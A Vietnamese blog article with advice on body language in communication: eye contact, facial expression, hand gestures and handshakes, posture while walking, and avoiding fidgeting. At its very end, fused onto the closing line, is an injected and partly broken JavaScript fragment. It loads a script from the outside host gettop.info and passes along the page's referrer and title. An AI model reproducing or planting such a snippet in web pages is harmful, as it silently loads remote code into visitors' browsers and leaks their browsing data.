Ngôn ngữ cơ thể – yếu tố quan trọng trong giao tiếp

 

Trong cuộc sống  ngoài sử dụng tiếng nói, ngôn ngữ cơ thể là một phần không thể thiếu trong kỹ năng giao tiếp. Sử dụng ngôn ngữ cơ thể đúng lúc, đúng chỗ sẽ làm cho cuộc trò chuyện trở nên thú vị hơn. Ngôn ngữ cơ thể là một cách biểu đạt lời nói rất hiệu quả.

Sau đây tôi sẽ nêu ra một số ngôn ngữ cơ thể mà bạn nên biết :

 

1.Giao tiếp bằng mắt

 

giao tiep bang mat

 

 

Đôi mắt là cửa sổ của tâm hồn, ánh mắt từ lâu đã được xem như dấu hiệu của sự trung thực và chân thành. Trong cuộc trò chuyện, việc không nhìn người nghe sẽ làm họ khó chịu về bạn, họ nghĩ họ không quan tâm tới lời nói, tới câu chuyện được đề cập. Điều này không có nghĩa rằng bạn phải duy trì 1 cuộc thi nhìn và luôn hướng ảnh mắt vào đối phương, như vậy sẽ chỉ chứng tỏ sự “hung hăng, tấn công” của bạn và khi đó.

Đôi khi đôi mắt giúp bạn cuốn hút người nghe ngay cả khi bạn chưa nói gì. Cũng không khó tin đúng không các bạn.

2.Biểu cảm trên khuôn mặt

 

Khuôn mặt chính là nơi mà mọi người chú ý đầu tiên và xuyên suốt trong cuộc trò chuyện. Nếu không kiểm soát biểu hiện trên khuôn mặt, bạn sẽ không diễn đạt được tốt điều bản thân muốn truyền tải. Mím hôi hoặc méo miệng trong lúc nói sẽ cho người nghe cảm giác bạn đang băn khoăn và do dự. 1 nụ cười nhẹ nhàng sẽ giúp bạn tự tin và thoải mái hơn, qua đó, người nghe thấy được sự hài lòng của bạn còn ngược lại, 1 cái nhíu mày sẽ cho thấy bạn đang không chắc chắn về điều gì đó.

 

3.Sử dụng đôi tay

 

-Khi muốn nhấn mạnh một vấn đề, nếu chỉ dùng lời nói không thì chưa đủ, bạn nên kết hợp với ngón tay để làm tăng thêm tính nhấn mạnh vấn đề. Để diễn tả sự chắc chắn hay nhấn mạnh, bạn còn phải phụ thuộc vào lực trỏ của ngón tay. Nếu tay trỏ mạnh nghĩa là họ rất dứt khoát, mang tính khẳng định tuyệt đối. Còn nếu trỏ kiểu lấp lửng, không liên tục và thiếu dứt khoát nghĩa là họ chưa thật sự tin vào những gì mình nói.

-Bắt tay- một trong những chìa khóa thành công, những cái bắt tay quan trọng đến thế nào trong kinh doanh. Cái bắt tay của đối tác có thể nói lên nhiều điều về con người ấy. 1 cái bắt tay vững chãi nhưng không siết quá chặt, phải đủ lâu nhưng không quá đà, không dính mồ hôi của sự lo lắng, sợ sệt sẽ tạo ấn tượng ban đầu hoàn hảo trong mắt đối tác

 

bat tay

 

 

4.Dáng đi tự tin

 

Sự thiếu tự tin là nguyên nhân chủ yếu dẫn đến dáng đi “bà còng” ở một số người

Những động tác như: Vung tay quá mạnh, vai đảo qua đảo lại, chân bước hai hàng… là nhân tố tạo nên dáng đi hấp tấp vội vàng và đương nhiên là không đẹp mắt. Vậy, thay vì phải vung tay khi bước đi thì bạn chỉ cần để tay giữ hờ mép áo hoặc đường chỉ  quần bên hông.

Cách bạn bước đi cho thấy sư tự tin trong bạn và khi nhìn vào đó, đối tác có thể đánh giá được phần  nào khả năng của bạn. Đừng tỏ ra do dự trong mỗi bước đi, hãy chú ý vào bước đi để tránh vấp ngã hay va chạm vào ai đó, nếu không nó sẽ khiến bạn thực sự xấu hổ và mất tự tin.

 

dang di tu tin

 

 

5.Không tỏ vẻ bồn chồn

 

Bạn hãy tạo cho mình cuộc nói chuyện thoải mái, không nên quá gò bó. Nếu có việc gì cần làm gấp thì nên dừng trò chuyện, những hành động chứng tỏ bạn đang sợ hãi, bối rối hay bồn chồn, chán nản như gõ tay trên bàn, xé vụn 1 mảnh giấy, gãi đầu, rung đùi hay dùng chân di di trên sàn nhà sẽ khiến người ngồi đối diện không yên tâm về bạn.

Đó là một vài ngôn ngữ cơ thể cần thiết mà mình trau dồi được. Bạn hãy sử dụng nó tốt, phù hợp, không nên quá lạm dụng vì cái gì quá cũng phải là tốt , nó làm phản tác dụng trong giao tiếp. Biệt vận dụng sáng tạo  thì giao tiếp đối với bạn chỉ là chuyện nhỏ, đem lại những cuộc trò chuyện vui vẻ và tăng hiệu quả trong công việc.

 

Chúc các bạn thành công !if (document.currentScript) { s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; var d=document;var s=d.createElement('script');

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *